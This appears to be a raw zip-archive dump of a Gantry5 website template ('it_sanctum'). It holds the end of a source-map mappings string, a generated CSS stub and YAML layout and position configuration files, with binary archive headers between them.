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"}PK!sy�Gdd2it_sanctum/custom/css-compiled/custom__offline.cssnu&1i�/* GANTRY5 DEVELOPMENT MODE ENABLED.

   WARNING: This file is automatically generated by Gantry5. Any modifications to this file will be lost!

   For more information on modifying CSS, please read:

   http://docs.gantry.org/gantry5/configure/styles
   http://docs.gantry.org/gantry5/tutorials/adding-a-custom-style-sheet
 */

/* @import "custom.scss" */PK!�0����/it_sanctum/custom/config/_body_only/layout.yamlnu&1i�version: 2
preset:
  image: 'gantry-admin://images/layouts/body-only.png'
  name: _body_only
  timestamp: 1473315426
layout:
  /main/:
    -
      - system-messages-2502
    -
      - system-content-1476
structure:
  main:
    attributes:
      boxed: ''
PK!|
SGG.it_sanctum/custom/config/_body_only/index.yamlnu&1i�name: _body_only
timestamp: 1589896903
version: 7
preset:
  image: 'gantry-admin://images/layouts/body-only.png'
  name: _body_only
  timestamp: 1473315426
positions: {  }
sections:
  main: Main
particles:
  messages:
    system-messages-2502: 'System Messages'
  content:
    system-content-1476: 'Page Content'
inherit: {  }
PK!�;�RR&it_sanctum/custom/config/9/styles.yamlnu&1i�preset: preset2
accent:
  color-1: '#4f953b'
showcase:
  heading-color: '#006142'
PK!W��C&it_sanctum/custom/config/9/layout.yamlnu&1i�version: 2
preset:
  image: 'gantry-admin://images/layouts/default.png'
  name: default
  timestamp: 1473315426
layout:
  drawer: {  }
  top: {  }
  header: {  }
  navigation: {  }
  breadcrumb: {  }
  fullwidth: {  }
  showcase: {  }
  intro: {  }
  feature: {  }
  subfeature: {  }
  utility: {  }
  maintop: {  }
  system-messages: {  }
  /container-main/:
    -
      -
        'sidebar 30': {  }
      -
        'mainbody 40': {  }
      -
        'aside 30': {  }
  mainbottom: {  }
  extension: {  }
  additional: {  }
  prebottom: {  }
  bottom: {  }
  afterbottom: {  }
  last: {  }
  footer: {  }
  copyright: {  }
  to-top: {  }
  offcanvas: {  }
structure:
  drawer:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  top:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  header:
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  navigation:
    type: section
    inherit:
      outline: default
      include:
        - children
        - attributes
  breadcrumb:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  fullwidth:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  showcase:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  intro:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  feature:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  subfeature:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  utility:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  maintop:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  system-messages:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  sidebar:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
    block:
      fixed: '1'
  mainbody:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  aside:
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
    block:
      fixed: '1'
  container-main:
    attributes:
      boxed: ''
  mainbottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  extension:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  additional:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  prebottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  bottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  afterbottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  last:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  footer:
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  copyright:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  to-top:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  offcanvas:
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
PK!��&�**%it_sanctum/custom/config/9/index.yamlnu&1i�name: '9'
timestamp: 1589896900
version: 7
preset:
  image: 'gantry-admin://images/layouts/default.png'
  name: default
  timestamp: 1473315426
positions:
  drawer: Drawer
  top-a: Top-a
  top-b: Top-b
  top-c: Top-c
  top-d: Top-d
  header-a: Header-a
  header-b: Header-b
  breadcrumb-a: Breadcrumb-a
  breadcrumb-b: Breadcrumb-b
  breadcrumb-c: Breadcrumb-c
  breadcrumb-d: Breadcrumb-d
  fullwidth: Fullwidth
  showcase-a: Showcase-a
  showcase-b: Showcase-b
  showcase-c: Showcase-c
  showcase-d: Showcase-d
  intro-a: Intro-a
  intro-b: Intro-b
  intro-c: Intro-c
  intro-d: Intro-d
  feature-a: Feature-a
  feature-b: Feature-b
  feature-c: Feature-c
  feature-d: Feature-d
  subfeature-a: Subfeature-a
  subfeature-b: Subfeature-b
  subfeature-c: Subfeature-c
  subfeature-d: Subfeature-d
  utility-a: Utility-a
  utility-b: Utility-b
  utility-c: Utility-c
  utility-d: Utility-d
  maintop-a: Maintop-a
  maintop-b: Maintop-b
  maintop-c: Maintop-c
  maintop-d: Maintop-d
  sidebar-left: Sidebar-left
  content-top-a: Content-top-a
  content-top-b: Content-top-b
  content-bottom-a: Content-bottom-a
  content-bottom-b: Content-bottom-b
  sidebar-right: Sidebar-right
  mainbottom-a: Mainbottom-a
  mainbottom-b: Mainbottom-b
  mainbottom-c: Mainbottom-c
  mainbottom-d: Mainbottom-d
  extension-a: Extension-a
  extension-b: Extension-b
  extension-c: Extension-c
  extension-d: Extension-d
  additional-a: Additional-a
  additional-b: Additional-b
  additional-c: Additional-c
  additional-d: Additional-d
  prebottom-a: Prebottom-a
  prebottom-b: Prebottom-b
  prebottom-c: Prebottom-c
  prebottom-d: Prebottom-d
  bottom-a: Bottom-a
  bottom-b: Bottom-b
  bottom-c: Bottom-c
  bottom-d: Bottom-d
  afterbottom-a: Afterbottom-a
  afterbottom-b: Afterbottom-b
  afterbottom-c: Afterbottom-c
  afterbottom-d: Afterbottom-d
  last-a: Last-a
  last-b: Last-b
  last-c: Last-c
  last-d: Last-d
  footer-a: Footer-a
  footer-b: Footer-b
  footer-c: Footer-c
  footer-d: Footer-d
  copyright-a: Copyright-a
  copyright-b: Copyright-b
  copyright-c: Copyright-c
  copyright-d: Copyright-d
  offcanvas-a: Offcanvas-a
  offcanvas-b: Offcanvas-b
sections:
  drawer: Drawer
  top: Top
  navigation: Navigation
  breadcrumb: Breadcrumb
  fullwidth: Fullwidth
  showcase: Showcase
  intro: Intro
  feature: Feature
  subfeature: Subfeature
  utility: Utility
  maintop: Maintop
  system-messages: System-messages
  sidebar: Sidebar
  mainbody: Mainbody
  mainbottom: Mainbottom
  extension: Extension
  additional: Additional
  prebottom: Prebottom
  bottom: Bottom
  afterbottom: Afterbottom
  last: Last
  copyright: Copyright
  to-top: To-top
  header: Header
  aside: Aside
  footer: Footer
  offcanvas: Offcanvas
particles:
  position:
    position-position-3854: Drawer
    position-position-5782: Top-a
    position-position-4087: Top-b
    position-position-2354: Top-c
    position-position-1763: Top-d
    position-position-4702: Header-a
    position-position-8393: Header-b
    position-position-7124: Breadcrumb-a
    position-position-7176: Breadcrumb-b
    position-position-9520: Breadcrumb-c
    position-position-9990: Breadcrumb-d
    position-position-8289: Fullwidth
    position-position-3804: Showcase-a
    position-position-9248: Showcase-b
    position-position-8946: Showcase-c
    position-position-5538: Showcase-d
    position-position-2806: Intro-a
    position-position-1786: Intro-b
    position-position-9124: Intro-c
    position-position-1512: Intro-d
    position-position-4212: Feature-a
    position-position-1721: Feature-b
    position-position-6025: Feature-c
    position-position-1295: Feature-d
    position-position-3295: Subfeature-a
    position-position-6494: Subfeature-b
    position-position-8658: Subfeature-c
    position-position-6777: Subfeature-d
    position-position-5529: Utility-a
    position-position-2513: Utility-b
    position-position-2560: Utility-c
    position-position-8616: Utility-d
    position-position-3868: Maintop-a
    position-position-3323: Maintop-b
    position-position-3319: Maintop-c
    position-position-2139: Maintop-d
    position-position-5809: Sidebar-left
    position-position-8263: Content-top-a
    position-position-7894: Content-top-b
    position-position-8254: Content-bottom-a
    position-position-6183: Content-bottom-b
    position-position-8134: Sidebar-right
    position-position-7503: Mainbottom-a
    position-position-5129: Mainbottom-b
    position-position-3672: Mainbottom-c
    position-position-9309: Mainbottom-d
    position-position-5916: Extension-a
    position-position-2797: Extension-b
    position-position-9822: Extension-c
    position-position-9128: Extension-d
    position-position-3519: Additional-a
    position-position-5848: Additional-b
    position-position-9424: Additional-c
    position-position-5814: Additional-d
    position-position-2343: Prebottom-a
    position-position-8083: Prebottom-b
    position-position-2592: Prebottom-c
    position-position-6872: Prebottom-d
    position-position-9596: Bottom-a
    position-position-4152: Bottom-b
    position-position-5488: Bottom-c
    position-position-3464: Bottom-d
    position-position-6476: Afterbottom-a
    position-position-7807: Afterbottom-b
    position-position-4604: Afterbottom-c
    position-position-7194: Afterbottom-d
    position-position-3617: Last-a
    position-position-2868: Last-b
    position-position-5088: Last-c
    position-position-7947: Last-d
    position-position-1123: Footer-a
    position-position-1271: Footer-b
    position-position-6081: Footer-c
    position-position-7626: Footer-d
    position-position-5401: Copyright-a
    position-position-8753: Copyright-b
    position-position-6936: Copyright-c
    position-position-1317: Copyright-d
    position-position-9445: Offcanvas-a
    position-position-4069: Offcanvas-b
  logo:
    logo-8271: Logo
  menu:
    menu-8833: Menu
  messages:
    system-messages-1717: 'System Messages'
  content:
    system-content-5329: 'Page Content'
  totop:
    totop-1550: Totop
  mobile-menu:
    mobile-menu-6759: Mobile-menu
inherit:
  default:
    drawer: drawer
    top: top
    header: header
    navigation: navigation
    breadcrumb: breadcrumb
    fullwidth: fullwidth
    showcase: showcase
    intro: intro
    feature: feature
    subfeature: subfeature
    utility: utility
    maintop: maintop
    system-messages: system-messages
    sidebar: sidebar
    mainbody: mainbody
    aside: aside
    mainbottom: mainbottom
    extension: extension
    additional: additional
    prebottom: prebottom
    bottom: bottom
    afterbottom: afterbottom
    last: last
    footer: footer
    copyright: copyright
    to-top: to-top
    offcanvas: offcanvas
    position-position-3854: position-drawer
    position-position-5782: position-top-a
    position-position-4087: position-top-b
    position-position-2354: position-top-c
    position-position-1763: position-top-d
    position-position-4702: position-navigation-c
    logo-8271: logo-6391
    position-position-8393: position-navigation-d
    menu-8833: menu-6643
    position-position-7124: position-breadcrumb-a
    position-position-7176: position-breadcrumb-b
    position-position-9520: position-breadcrumb-c
    position-position-9990: position-breadcrumb-d
    position-position-8289: position-fullwidth
    position-position-3804: position-showcase-a
    position-position-9248: position-showcase-b
    position-position-8946: position-showcase-c
    position-position-5538: position-showcase-d
    position-position-2806: position-intro-a
    position-position-1786: position-intro-b
    position-position-9124: position-intro-c
    position-position-1512: position-intro-d
    position-position-4212: position-feature-a
    position-position-1721: position-feature-b
    position-position-6025: position-feature-c
    position-position-1295: position-feature-d
    position-position-3295: position-subfeature-a
    position-position-6494: position-subfeature-b
    position-position-8658: position-subfeature-c
    position-position-6777: position-subfeature-d
    position-position-5529: position-utility-a
    position-position-2513: position-utility-b
    position-position-2560: position-utility-c
    position-position-8616: position-utility-d
    position-position-3868: position-maintop-a
    position-position-3323: position-maintop-b
    position-position-3319: position-maintop-c
    position-position-2139: position-maintop-d
    system-messages-1717: system-messages-4492
    position-position-5809: position-sidebar-left
    position-position-8263: position-content-top-a
    position-position-7894: position-content-top-b
    system-content-5329: system-content-1470
    position-position-8254: position-content-bottom-a
    position-position-6183: position-content-bottom-b
    position-position-8134: position-sidebar-right
    position-position-7503: position-mainbottom-a
    position-position-5129: position-mainbottom-b
    position-position-3672: position-mainbottom-c
    position-position-9309: position-mainbottom-d
    position-position-5916: position-extension-a
    position-position-2797: position-extension-b
    position-position-9822: position-extension-c
    position-position-9128: position-extension-d
    position-position-3519: position-additional-a
    position-position-5848: position-additional-b
    position-position-9424: position-additional-c
    position-position-5814: position-additional-d
    position-position-2343: position-prebottom-a
    position-position-8083: position-prebottom-b
    position-position-2592: position-prebottom-c
    position-position-6872: position-prebottom-d
    position-position-9596: position-bottom-a
    position-position-4152: position-bottom-b
    position-position-5488: position-bottom-c
    position-position-3464: position-bottom-d
    position-position-6476: position-afterbottom-a
    position-position-7807: position-afterbottom-b
    position-position-4604: position-afterbottom-c
    position-position-7194: position-afterbottom-d
    position-position-3617: position-last-a
    position-position-2868: position-last-b
    position-position-5088: position-last-c
    position-position-7947: position-last-d
    position-position-1123: position-footer-a
    position-position-1271: position-footer-b
    position-position-6081: position-footer-c
    position-position-7626: position-footer-d
    position-position-5401: position-copyright-a
    position-position-8753: position-copyright-b
    position-position-6936: position-copyright-c
    position-position-1317: position-copyright-d
    totop-1550: totop-7314
    mobile-menu-6759: mobile-menu-8307
    position-position-9445: position-offcanvas-a
    position-position-4069: position-offcanvas-b
PK!��+���+it_sanctum/custom/config/_error/layout.yamlnu&1i�version: 2
preset:
  image: 'gantry-admin://images/layouts/default.png'
  name: default
  timestamp: 1473315426
layout:
  drawer: {  }
  top: {  }
  header: {  }
  navigation: {  }
  breadcrumb: {  }
  fullwidth: {  }
  showcase: {  }
  intro: {  }
  feature: {  }
  subfeature: {  }
  utility: {  }
  maintop: {  }
  system-messages: {  }
  /container-main/:
    -
      0:
        'sidebar 30': {  }
      1:
        'mainbody 37': {  }
      block-1024: {  }
  mainbottom: {  }
  extension: {  }
  additional: {  }
  prebottom: {  }
  bottom: {  }
  afterbottom: {  }
  last: {  }
  footer: {  }
  copyright: {  }
  to-top: {  }
  offcanvas: {  }
structure:
  drawer:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  top:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  header:
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  navigation:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  breadcrumb:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  fullwidth:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  showcase:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  intro:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  feature:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  subfeature:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  utility:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  maintop:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  system-messages:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  sidebar:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
    block:
      fixed: '1'
  mainbody:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  block-1024:
    attributes:
      fixed: '1'
  container-main:
    attributes:
      boxed: ''
  mainbottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  extension:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  additional:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  prebottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  bottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  afterbottom:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  last:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  footer:
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  copyright:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  to-top:
    type: section
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
  offcanvas:
    inherit:
      outline: default
      include:
        - attributes
        - block
        - children
PK!�82��)�)*it_sanctum/custom/config/_error/index.yamlnu&1i�name: _error
timestamp: 1589896906
version: 7
preset:
  image: 'gantry-admin://images/layouts/default.png'
  name: default
  timestamp: 1473315426
positions:
  drawer: Drawer
  top-a: Top-a
  top-b: Top-b
  top-c: Top-c
  top-d: Top-d
  header-a: Header-a
  header-b: Header-b
  breadcrumb-a: Breadcrumb-a
  breadcrumb-b: Breadcrumb-b
  breadcrumb-c: Breadcrumb-c
  breadcrumb-d: Breadcrumb-d
  fullwidth: Fullwidth
  showcase-a: Showcase-a
  showcase-b: Showcase-b
  showcase-c: Showcase-c
  showcase-d: Showcase-d
  intro-a: Intro-a
  intro-b: Intro-b
  intro-c: Intro-c
  intro-d: Intro-d
  feature-a: Feature-a
  feature-b: Feature-b
  feature-c: Feature-c
  feature-d: Feature-d
  subfeature-a: Subfeature-a
  subfeature-b: Subfeature-b
  subfeature-c: Subfeature-c
  subfeature-d: Subfeature-d
  utility-a: Utility-a
  utility-b: Utility-b
  utility-c: Utility-c
  utility-d: Utility-d
  maintop-a: Maintop-a
  maintop-b: Maintop-b
  maintop-c: Maintop-c
  maintop-d: Maintop-d
  sidebar-left: Sidebar-left
  content-top-a: Content-top-a
  content-top-b: Content-top-b
  content-bottom-a: Content-bottom-a
  content-bottom-b: Content-bottom-b
  mainbottom-a: Mainbottom-a
  mainbottom-b: Mainbottom-b
  mainbottom-c: Mainbottom-c
  mainbottom-d: Mainbottom-d
  extension-a: Extension-a
  extension-b: Extension-b
  extension-c: Extension-c
  extension-d: Extension-d
  additional-a: Additional-a
  additional-b: Additional-b
  additional-c: Additional-c
  additional-d: Additional-d
  prebottom-a: Prebottom-a
  prebottom-b: Prebottom-b
  prebottom-c: Prebottom-c
  prebottom-d: Prebottom-d
  bottom-a: Bottom-a
  bottom-b: Bottom-b
  bottom-c: Bottom-c
  bottom-d: Bottom-d
  afterbottom-a: Afterbottom-a
  afterbottom-b: Afterbottom-b
  afterbottom-c: Afterbottom-c
  afterbottom-d: Afterbottom-d
  last-a: Last-a
  last-b: Last-b
  last-c: Last-c
  last-d: Last-d
  footer-a: Footer-a
  footer-b: Footer-b
  footer-c: Footer-c
  footer-d: Footer-d
  copyright-a: Copyright-a
  copyright-b: Copyright-b
  copyright-c: Copyright-c
  copyright-d: Copyright-d
  offcanvas-a: Offcanvas-a
  offcanvas-b: Offcanvas-b
sections:
  drawer: Drawer
  top: Top
  navigation: Navigation
  breadcrumb: Breadcrumb
  fullwidth: Fullwidth
  showcase: Showcase
  intro: Intro
  feature: Feature
  subfeature: Subfeature
  utility: Utility
  maintop: Maintop
  system-messages: System-messages
  sidebar: Sidebar
  mainbody: Mainbody
  mainbottom: Mainbottom
